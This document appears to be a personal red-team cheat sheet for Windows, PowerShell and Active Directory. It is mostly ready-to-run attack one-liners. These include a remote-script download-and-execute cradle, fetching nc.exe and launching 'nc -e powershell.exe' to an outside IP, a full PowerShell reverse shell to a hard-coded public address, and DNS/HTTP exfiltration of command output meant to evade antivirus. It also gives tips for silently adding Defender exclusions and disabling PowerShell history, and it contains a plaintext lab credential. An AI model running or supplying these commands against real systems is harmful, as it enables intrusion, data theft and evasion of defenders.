Win
Windows related: AdminSDHoler / PowerShell / LDAP
Links:
- https://github.com/samratashok/nishang/tree/master/Shells
- http://www.labofapenetrationtester.com/2016/09/amsi.html
- https://github.com/besimorhino/powercat
- https://beta.hackndo.com/service-principal-name-spn/
- A lot of commands: https://mlcsec.com/active-directory-domain-enumeration/#get-current-domain
Run command as another user (runas equivalent)
$passwd = ConvertTo-SecureString 'w3lc0meFr31nd' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('CASCADE\ArkSvc', $passwd)
Invoke-Command -computername 127.0.0.1 -ScriptBlock { whoami } -credential $cred
Invoke-Command -computername 127.0.0.1 -ScriptBlock { wget http://10.10.15.218/nc.exe -OutFile C:\Users\Public\nc.exe } -credential $cred
Download String and execute (IWR)
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
HTTP requests (Invoke-webRequest)
From:https://davidhamann.de/2019/04/12/powershell-invoke-webrequest-by-example/
Invoke-WebRequest http://httpbin.org/json
Redirect content to file
$r = Invoke-WebRequest http://httpbin.org/json
$r.RawContent > C:\My\Path\to\file.txt
Set headers
$r = iwr http://httpbin.org/headers -Headers @{'Accept' = 'application/json'; 'X-My-Header' = 'Hello World'}
Send file
$r = Get-Content test.txt -ReadCount 0 | `iwr http://httpbin.org/post `
-Method 'POST' `
-Headers @{'Content-Type' = 'application/json; charset=utf-8'}
or
iwr http://httpbin.org/post -Method 'POST' -ContentType 'application/json; charset=utf-8' -Body '{"hello": "world"}'
Proxy download
powershell.exe -nop -c "`$wc = New-Object System.Net.Webclient; `$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) Like Gecko'); `$wc.proxy=[System.Net.WebRequest]::DefaultWebProxy; `$wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX (`$wc.downloadstring('$URL'))"
Invoke-Command -computername 127.0.0.1 -ScriptBlock { C:\Users\arksvc\nc.exe 10.10.15.218 1234 -e powershell.exe } -credential $cred
Reverse SHELL
$client = New-Object System.Net.Sockets.TCPClient("163.172.232.45",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Retreive output using DNS request
# On your host:
# $ nc -lnvup 53
# Replace <HOSTIP> with ip of the listening machine
powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));"
Or using HTTP request (bypassing possible AV):
powershell -c "whoami | % {$w=(New-Object System.IO.StreamWriter((New-Object System.Net.Sockets.TCPClient([System.Net.IPAddress]::Parse(\"<HOSTIP>\"),80)).GetStream()));$w.WriteLine($_);$w.Flush()}"
Dummy port scanner
$ErrorActionPreference = "silentlyContinue" # suppress warning
1..255 | %{
$IP = "1.253.241.$_"
echo "$IP";
if (Test-Connection "$ip" -Quiet) {
test-netconnection $IP -Port 80 | findstr /I "TcpTest"
test-netconnection $IP -Port 443 | findstr /I "TcpTest"
test-netconnection $IP -Port 8080 | findstr /I "TcpTest"
test-netconnection $IP -Port 8081 | findstr /I "TcpTest"
}
}
Not powershell ?
check it out: https://github.com/Ben0xA/nps
Modify AV exclusion directory
Article: https://www.fortynorthsecurity.com/remotely-modify-anti-virus-configurations/
Red teamers, you can turn off Defender from admin powershell with ‘Set-MpPreference -DisableRealTimeMonitoring $true’ but it will result in a balloon notification for anyone logged on. Instead, use ‘Add-MpPreference -ExclusionPath “c:\temp”’ to silently add an exclusions folder.
Pingcastle
- Patch the code & build
- Use
--no-enum-limit
AdminSDHolder
Comment savoir si un compte est protégé par AdminSDHolder ?
La méthode la plus fiable pour savoir si un compte est protégé par ce processus est de regarder l’attribut Active Directory ”adminCount”. Si ce dernier est positionné à “1″, l’objet a été modifié par AdminSDHolder.
La requête PowerShell/LDAP suivante permet de retourner la liste des utilisateurs concernés :
Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
La requête PowerShell/LDAP suivante permet de retourner la liste des groupes concernés :
Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
Get-ADObject -searchBase "CN=AdminSDHolder,CN=System,DC=gamac,DC=intra" -LdapFilter "(objectclas
s=top)" -properties *| select -ExpandProperty nTSecurityDescriptor | Format-Table -autosize -Wrap
PS C:\Users\user_seek> $acl = Get-Acl "AD:\CN=AdminSDHolder,CN=System,DC=gamac,DC=intra"
PS C:\Users\user_seek> ConvertFrom-SddlString -Sddl $acl.Sddl -Type RegistryRights |Foreach-Object {$_.DiscretionaryAcl}
Remove powershell history
# exemple 1 : désactiver totalement l'historique
Set-PSReadlineOption -HistorySaveStyle SaveNothing
# exemple 1 : désactiver totalement l'historique
Set-PSReadlineOption -HistorySaveStyle SaveNothing
Citrix
CitrixReceiver
Install citrixreceiver with no request to register an email:
CitrixReceiver.exe /ALLOWADDSTORE=N [/Silent]
Create fake and weak service
This was tested on Windows server 2019
- create user
- Unquoted service
> sc create "Some Vulnerable Service" binpath= "C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe" Displayname= "Vuln Service DP" start= auto
// Create Directory
> mkdir "C:\Program Files\A Subfolder\B Subfolder\C Subfolder"
> icacls "C:\Program Files\A Subfolder"
// Give user rights
> icacls "C:\Program Files\A Subfolder" /grant "BUILTIN\Users":W
- Allow one user to start/stop the service [http://woshub.com/set-permissions-on-windows-service/]
sc.exe sdshow <SERVICE>
D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
(A;;CCLCSWRPWPDTLOCRRC;;;SY)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
S: — System Access Control List (SACL)
D: — Discretionary ACL (DACL)
The first letter after brackets means: allow (A), or deny (D).
CC — SERVICE_QUERY_CONFIG (request service settings)
LC — SERVICE_QUERY_STATUS (service status polling)
SW — SERVICE_ENUMERATE_DEPENDENTS
LO — SERVICE_INTERROGATE
CR — SERVICE_USER_DEFINED_CONTROL
RC — READ_CONTROL
RP — SERVICE_START
WP — SERVICE_STOP
DT — SERVICE_PAUSE_CONTINUE
The last 2 characters are the objects (user, group or SID) that are granted permissions. There is a list of predefined groups.
AU Authenticated Users
AO Account operators
RU Alias to allow previous Windows 2000
AN Anonymous logon
AU Authenticated users
BA Built-in administrators
BG Built-in guests
BO Backup operators
BU Built-in users
CA Certificate server administrators
CG Creator group
CO Creator owner
DA Domain administrators
DC Domain computers
DD Domain controllers
DG Domain guests
DU Domain users
EA Enterprise administrators
ED Enterprise domain controllers
WD Everyone
PA Group Policy administrators
IU Interactively logged-on user
LA Local administrator
LG Local guest
LS Local service account
SY Local system
NU Network logon user
NO Network configuration operators
NS Network service account
PO Printer operators
PS Personal self
PU Power users
RS RAS servers group
RD Terminal server users
RE Replicator
RC Restricted code
SA Schema administrators
SO Server operators
SU Service logon user
Instead of a predefined group, you can explicitly specify a user or group by SID. To get the SID for the current user, you can use the command:
whoami /user
Or you can find the SID for any domain user using the Get-ADUser cmdlet:
Get-ADUser -Identity 'sadams' | select SID
You can get the SID of the AD security group using the Get-ADGroup cmdlet:
Get-ADGroup -Filter {Name -eq "ny-ithelpdesk"} | Select SID
wmic useraccount get name, sid
sc sdset <SERVICE> "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;RPWPCR;;;S-1-5-21-2133228432-2794320136-1823075350-1000)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
- Build service
package main
import "github.com/kardianos/service"
import "log"
import "time"
import "net"
var host = "unixed.fr"
var port = "80"
var logger service.Logger
type program struct{}
func (p *program) Start(s service.Service) error {
// Start should not block. Do the actual work async.
go p.run()
return nil
}
func (p *program) run() {
// Do work here
timeout := time.Duration(1 * time.Second)
for {
net.DialTimeout("tcp", host+":"+port, timeout)
time.Sleep(10 * time.Second)
}
}
func (p *program) Stop(s service.Service) error {
// Stop should not block. Return with a few seconds.
return nil
}
func main() {
svcConfig := &service.Config{
Name: "My Service (ping)",
DisplayName: "My Service (ping)",
Description: "This service will 'ping' a server of mine each 10 secs.",
}
prg := &program{}
s, err := service.New(prg, svcConfig)
if err != nil {
log.Fatal(err)
}
logger, err = s.Logger(nil)
if err != nil {
log.Fatal(err)
}
err = s.Run()
if err != nil {
logger.Error(err)
}
}
Find vulnerable service:
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """